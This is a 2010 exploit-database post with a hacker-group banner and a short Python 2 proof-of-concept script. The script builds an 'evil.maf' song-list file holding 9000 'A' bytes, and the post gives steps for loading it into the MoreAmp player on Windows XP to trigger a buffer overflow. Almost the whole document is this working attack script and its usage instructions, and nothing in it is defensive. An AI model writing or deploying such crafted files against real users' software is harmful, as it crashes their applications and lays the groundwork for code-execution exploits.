Proof of concept exploit that demonstrates how MoreAmp suffers from a buffer overflow vulnerability.
e9ac89d09845c0c12a612c399f845e41e6ccb14253a08434608a6bb2ea7750b2
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#######################################################################################################
#!/usr/bin/python
#
# Title: MoreAmp (.maf) Buffer Overflow POC
# Author: Sid3^effects aKa HaRi
# Date: June 19th, 2010
# Platform: Windows XP sp3 En
# Thanks to: r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_
# greetz to : All ICW members and my friends :) luv y0 guyz
#
# Usage : File-->Open Song List-->load your evil song list(.maf)
print "################################################################################"
print " MoreAmp (.maf) Buffer Overflow POC "
print " By: Sid3^effects "
print " Usage: File-->Open Song List-->load your evil song list(.maf) "
print "################################################################################"
boom = ("\x41" * 9000)
try:
f1 = open("evil.maf","w");
f1.write(boom);
f1.close();
print "\n MoreAmp (.maf) Buffer Overflow POC"
print "\nFile Created Successfully.\n"
print "Usage: \n[-] Click File\n[-] Open Song list\n[-] Load you evil file.maf "
except:
print "Error."